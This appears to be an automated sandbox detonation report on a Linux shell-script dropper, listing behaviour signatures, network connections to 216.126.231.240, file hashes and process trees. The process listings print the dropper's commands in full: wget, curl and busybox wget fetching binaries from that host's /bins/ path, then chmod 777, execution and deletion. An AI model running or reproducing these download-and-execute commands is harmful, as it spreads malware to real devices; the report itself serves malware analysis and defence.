[chmod 777 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]

/tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw

[./7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]

/bin/rm

[rm 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]

/usr/bin/wget

[wget http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]

/bin/chmod

[chmod 777 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]

/tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0

[./3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]

/bin/rm

[rm 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
N/A 224.0.0.251:5353 udp
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.129.91:443 tcp
US 1.1.1.1:53 ocp-ingress.fastly.gnome.org udp
US 151.101.1.91:443 ocp-ingress.fastly.gnome.org tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
GB 89.187.167.8:443 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-21 01:07

Reported

2024-11-21 01:10

Platform

debian9-armhf-20240611-en

Max time kernel

49s

Max time network

88s

Command Line

[/tmp/85e6576f611d87e3ca88bd0764c96ad01c46376d6fcf2bb1b792e76f59eba88a.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok N/A
N/A /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo N/A
N/A /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P N/A
N/A /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw N/A
N/A /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 N/A
N/A /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 N/A
N/A /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in N/A
N/A /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR N/A
N/A /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss N/A
N/A /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw N/A
N/A /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE N/A
N/A /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao N/A
N/A /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf N/A
N/A /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 N/A
N/A /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao N/A
N/A /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf N/A
N/A /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 N/A
N/A /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in N/A
N/A /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR N/A
N/A /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss N/A
N/A /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw N/A
N/A /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE N/A
N/A /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 N/A
N/A /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok N/A
N/A /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo N/A
N/A /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P N/A
N/A /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw N/A
N/A /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/rm N/A
N/A N/A /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao N/A
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok /usr/bin/curl N/A
File opened for modification /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P /usr/bin/curl N/A
File opened for modification /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P /usr/bin/curl N/A
File opened for modification /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR /usr/bin/curl N/A
File opened for modification /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao /usr/bin/curl N/A
File opened for modification /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in /usr/bin/curl N/A
File opened for modification /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE /usr/bin/curl N/A
File opened for modification /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw /usr/bin/curl N/A
File opened for modification /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw /usr/bin/curl N/A
File opened for modification /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 /usr/bin/curl N/A
File opened for modification /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw /usr/bin/curl N/A
File opened for modification /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo /usr/bin/curl N/A
File opened for modification /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf /usr/bin/curl N/A
File opened for modification /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 /usr/bin/curl N/A
File opened for modification /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok /usr/bin/curl N/A
File opened for modification /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 /usr/bin/curl N/A
File opened for modification /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf /usr/bin/curl N/A
File opened for modification /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao /usr/bin/curl N/A
File opened for modification /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo /usr/bin/curl N/A
File opened for modification /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw /usr/bin/curl N/A
File opened for modification /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR /usr/bin/curl N/A
File opened for modification /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss /usr/bin/curl N/A
File opened for modification /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in /usr/bin/curl N/A
File opened for modification /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 /usr/bin/curl N/A
File opened for modification /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss /usr/bin/curl N/A
File opened for modification /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE /usr/bin/curl N/A
File opened for modification /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 /usr/bin/curl N/A
File opened for modification /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 /usr/bin/curl N/A

Processes

/tmp/85e6576f611d87e3ca88bd0764c96ad01c46376d6fcf2bb1b792e76f59eba88a.sh

[/tmp/85e6576f611d87e3ca88bd0764c96ad01c46376d6fcf2bb1b792e76f59eba88a.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]

/bin/chmod

[chmod 777 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]

/tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok

[./57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]

/bin/rm

[rm 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]

/usr/bin/wget

[wget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]

/bin/chmod

[chmod 777 QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]

/tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo

[./QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]

/bin/rm

[rm QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]

/usr/bin/wget

[wget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]

/bin/chmod

[chmod 777 MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]

/tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P

[./MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]

/bin/rm

[rm MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]

/usr/bin/wget

[wget http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]

/bin/chmod

[chmod 777 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]

/tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw

[./7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]

/bin/rm

[rm 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]

/usr/bin/wget

[wget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]

/bin/chmod

[chmod 777 mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]

/tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5

[./mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]

/bin/rm

[rm mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]

/usr/bin/wget

[wget http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]

/bin/chmod

[chmod 777 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]

/tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0

[./3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]

/bin/rm

[rm 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]

/usr/bin/wget

[wget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]

/bin/chmod

[chmod 777 WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]

/tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in

[./WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]

/bin/rm

[rm WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]

/usr/bin/wget

[wget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]

/bin/chmod

[chmod 777 DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]

/tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR

[./DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]

/bin/rm

[rm DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]

/usr/bin/wget

[wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]

/bin/chmod

[chmod 777 Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]

/tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss

[./Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]

/bin/rm

[rm Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]

/usr/bin/wget

[wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]

/bin/chmod

[chmod 777 Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]

/tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw

[./Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]

/bin/rm

[rm Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]

/usr/bin/wget

[wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]

/bin/chmod

[chmod 777 rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]

/tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE

[./rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]

/bin/rm

[rm rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]

/usr/bin/wget

[wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]

/bin/chmod

[chmod 777 aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]

/tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao

[./aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]

/bin/rm

[rm aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]

/usr/bin/wget

[wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]

/bin/chmod

[chmod 777 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]

